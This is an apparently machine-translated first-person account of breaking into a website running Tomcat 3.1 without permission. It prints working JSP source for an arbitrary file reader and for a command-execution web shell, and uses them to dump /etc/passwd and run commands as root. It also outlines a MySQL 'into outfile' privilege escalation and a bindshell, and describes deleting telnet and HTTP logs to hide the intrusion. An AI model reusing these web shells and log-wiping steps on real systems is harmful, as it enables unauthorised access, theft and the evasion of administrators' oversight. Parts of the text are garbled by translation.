On-the-spot record--How to invade the website based on JSP

JS is an accidental opportunity to browse to a website, the page is fresh and feels very comfortable. Web site is using JSP Development, I decided to test the security of the system for my personal interests.

telnet www.target.com 8080
GET /CHINANSL HTTP/1.1
[Enter]
[Enter]

The results returned are as follows:

HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2
.2.12 i386; java.vendor=Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404

〈h1〉Error: 404〈/h1〉
〈h2〉Location: /CHINANSL〈/h2〉File Not Found〈br〉/CHINANSL

Gets the name "Tomcat 3.1" for the running webserver. Remember once foundThis version of the vulnerability, and post to Bugtrap went up.

Recall, presumably through the "..." Technology can exit the Web directory, so:

http://target:8080/../../../../%00.jsp （不行）
http://target:8080/file/index.jsp （不行）
http://target:8080/index.JSP （不行）
http://target:8080/index.jsp%81 （不行）
http://target:8080/index.js%70 （不行）
http://target:8080/index.jsp%2581 （不行）
http://target:8080/WEB-INF/ （不行）

It seems that the security situation seems to be good, let's do a deeper test. Tomcat 3.1 brings up a management tool that allows you to view directories and files under the Web and add context. So try:

http://target:8080/admin/

The administrator did not delete or prohibit access to this directory, from a security point of view, this should be considered a more important error.

Next, click the "VIEW All" button to list the names of some files and directories under the Web directory, and quickly discover a component that uploads the file to the other's web directory via this component:

〈%@ page import="java.io.*" %〉
〈%
String file = request.getParameter("file");
String str = "";
FileInputStream fis = null;
DataInputStream dis = null;
try{
fis = new FileInputStream(file);
dis = new DataInputStream(fis);
while(true){
try{
str = dis.readLine();
}catch(Exception e){}
if(str == null)break;
out.print(str+"〈br〉");
}
}catch(IOException e){}
%〉

Then execute:

http://target:8080/upload/test.jsp?file=/etc/passwd

The password came out. The next process is to guess the password, without success. However, now the equivalent of a shell, can not guess the password to the first IE as a shell environment.
Then write a JSP file:

〈%@ page import="java.io.*" %〉
〈%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%〉

Then put the JSP through the upload upload, there is a shell.

http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
（详细结果这里就不列出来了）

How do I get root permissions? After a searchfoundThe system installed MySQL, and from the source code of the JSP to get the MySQL password, execute:

sqld"〉http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld

Show:

root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql

The system is MySQL running as root. Then I thought, now that I know the password for MySQL, I can write a shell program, let it create a table, then put my data into the table, then use the "Select ... into outfile;" Way to create a file on the system that allows the user to run my program while performing Su. (Remember apache.org was once invaded?) This approach is used by hackers).

After that, it's simpler to upload programs like Bindshell, run, get nobody permissions, and use the setuid shell created by Su Root to make itself root.

But then it was actually done, and the result was quite unexpected:

http://target:8080/upload/cmd.jsp?cmd=id

Show:

uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)

It turns out that this web shell was root!. Security settings for administrators how exactly do you do that?

http://target:8080/upload/cmd.jsp?cmd=ps+aux
果然是root身份运行的（不列出来了）

The rest of the story:

1, delete my Telnet record.

2, delete the HTTP log.

Clear Log I use the following method: Cat xxx |grep-v "IP" 〉〉temp and then cover the temp files that I have modified.

To illustrate the point that I did not replace thewebsitePage because I'm just a network security enthusiast. So, send an email to tell system admin! Of course, I mentioned in the letter that if UNITA information is neededTechnologyWe would be very happy to provide him with a safe service! (T114)